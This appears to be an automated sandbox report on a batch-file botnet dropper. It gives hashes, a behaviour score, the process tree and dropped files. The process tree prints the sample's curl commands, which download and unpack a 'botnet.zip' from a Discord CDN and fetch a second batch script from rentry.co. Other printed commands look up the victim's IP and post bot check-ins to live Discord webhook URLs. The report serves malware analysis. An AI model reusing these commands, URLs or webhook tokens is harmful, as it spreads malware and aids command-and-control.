ae85b053cd02d47d9eed876885ccb55e12bfa1a2ddea74c4a13623bc3006d3bf

General

Target

43213324_JC.bat
Size

782B
MD5

f97632eeb79a7c337306dfa33c2cc796
SHA1

a53183a5f48c1425a19b038a9ed209adeb90052c
SHA256

ae85b053cd02d47d9eed876885ccb55e12bfa1a2ddea74c4a13623bc3006d3bf
SHA512

5c028932c74020416b7987583b1b016f6d775739c0a3019e08a9afed62848cc7ab71cceec4a6d6953232eb57ffe3ff507f9f77f9f3ba4ec03f84aade40d895fc

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2384	forvmbox.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4748	powershell.exe
4748	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4748	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 1692	2272	cmd.exe	86
PID 2272 wrote to memory of 1692	2272	cmd.exe	86
PID 2272 wrote to memory of 4748	2272	cmd.exe	90
PID 2272 wrote to memory of 4748	2272	cmd.exe	90
PID 2272 wrote to memory of 2384	2272	cmd.exe	96
PID 2272 wrote to memory of 2384	2272	cmd.exe	96
PID 2272 wrote to memory of 2384	2272	cmd.exe	96
PID 2272 wrote to memory of 5008	2272	cmd.exe	97
PID 2272 wrote to memory of 5008	2272	cmd.exe	97
PID 5008 wrote to memory of 1412	5008	cmd.exe	98
PID 5008 wrote to memory of 1412	5008	cmd.exe	98
PID 5008 wrote to memory of 2276	5008	cmd.exe	99
PID 5008 wrote to memory of 2276	5008	cmd.exe	99
PID 2272 wrote to memory of 3400	2272	cmd.exe	100
PID 2272 wrote to memory of 3400	2272	cmd.exe	100
PID 2384 wrote to memory of 968	2384	forvmbox.exe	102
PID 2384 wrote to memory of 968	2384	forvmbox.exe	102
PID 968 wrote to memory of 4304	968	cmd.exe	103
PID 968 wrote to memory of 4304	968	cmd.exe	103
PID 968 wrote to memory of 64	968	cmd.exe	104
PID 968 wrote to memory of 64	968	cmd.exe	104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\43213324_JC.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\system32\curl.exe
  curl -o botnet.zip https://cdn.discordapp.com/attachments/1141139274176155688/1143684627261820988/botney.zip
  2⤵
  PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748
- C:\Users\Admin\Desktop\forvmbox.exe
  forvmbox.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C262.tmp\C263.bat C:\Users\Admin\Desktop\forvmbox.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4304
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: 17:25:33.35 {}\", \"description\": \" Fri 09/01/2023-17:25:33.35 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com 2>NUL|find "Address:"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    PID:1412
- - C:\Windows\system32\find.exe
    find "Address:"
    3⤵
    PID:2276
- C:\Windows\system32\curl.exe
  curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"[17:25:29.15] BOT Connected to the api's 154.61.71.13 \"}" https://discordapp.com/api/webhooks/1141892147268825178/IUMXKjBRDq-zmxzBqpZbXQgYYk64aCQAcwIC-bjly2VLNDVY2HwNkC-VMLnXgFk3UFVz
  2⤵
  PID:3400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C251.tmp\C262.tmp\C263.bat

Filesize
3KB

MD5
d5f935d0b2ddc1212f762ebe21bcb2ae

SHA1
59a320dce6123484a146bcdeac43277b39ca03cb

SHA256
7a68493dbb79471fc0fa27ab7f57380d199fff07c881588c72819426c5c740d7

SHA512
14864ebedaa6c1a6773dc768d9d5d3ed7f102d2aaaa6f09f32f5ee9a75ab738a256ca686c7b3e2f3b65e632610bff6e8cc26da10732b2546863cb94ec84fb76d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kx24xt3.v0k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\tlsv\.git\logs\refs\remotes\origin\HEAD

Filesize
186B

MD5
bfd3d0748ac3a838d224d452d6d5959f

SHA1
9506c3eba5b8fa602290a75597e2ef720767c5d6

SHA256
84ec21b7d8415b974e444e6e230a68a934719a7da452eb0f21ff4ff716e13ba5

SHA512
bef9d23bf2a0a5811c51684e933dba127f817a8dc4b7a0deedbc53af9beb64ab245dfa722b94f10defcbe311b448a6e593173639adb4069d076104ad6848a680

Download Submit
C:\Users\Admin\Desktop\botnet.zip

Filesize
102.2MB

MD5
5bb85a31212764a644641bae9c63335e

SHA1
595e8e7df7c8a1fd1c1bbbb973c747810ee46a37

SHA256
94cb34780ec0e193eff4dc120c09d4d2d4d87b0af48c853e4b6c7a9fd4deeb7e

SHA512
ddecf2be9bbaab3a2f93a571877e36a98fec7bfb64516646053e272fa22000183da6f865d2dc7be2af92ee480131e05d23d34efa838ca1bd15a48269551b8002

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
memory/4748-13-0x0000017E3CB80000-0x0000017E3CB90000-memory.dmp

Filesize
64KB

Download
memory/4748-16-0x0000017E3CB70000-0x0000017E3CB7A000-memory.dmp

Filesize
40KB

Download
memory/4748-15-0x0000017E3EF40000-0x0000017E3EF52000-memory.dmp

Filesize
72KB

Download
memory/4748-40-0x00007FF824C60000-0x00007FF825721000-memory.dmp

Filesize
10.8MB

Download
memory/4748-45-0x0000017E3CB80000-0x0000017E3CB90000-memory.dmp

Filesize
64KB

Download
memory/4748-46-0x0000017E3CB80000-0x0000017E3CB90000-memory.dmp

Filesize
64KB

Download
memory/4748-53-0x0000017E3CB80000-0x0000017E3CB90000-memory.dmp

Filesize
64KB

Download
memory/4748-14-0x0000017E3CB80000-0x0000017E3CB90000-memory.dmp

Filesize
64KB

Download
memory/4748-157-0x00007FF824C60000-0x00007FF825721000-memory.dmp

Filesize
10.8MB

Download
memory/4748-12-0x0000017E3CB80000-0x0000017E3CB90000-memory.dmp

Filesize
64KB

Download
memory/4748-11-0x00007FF824C60000-0x00007FF825721000-memory.dmp

Filesize
10.8MB

Download
memory/4748-1-0x0000017E3CB30000-0x0000017E3CB52000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing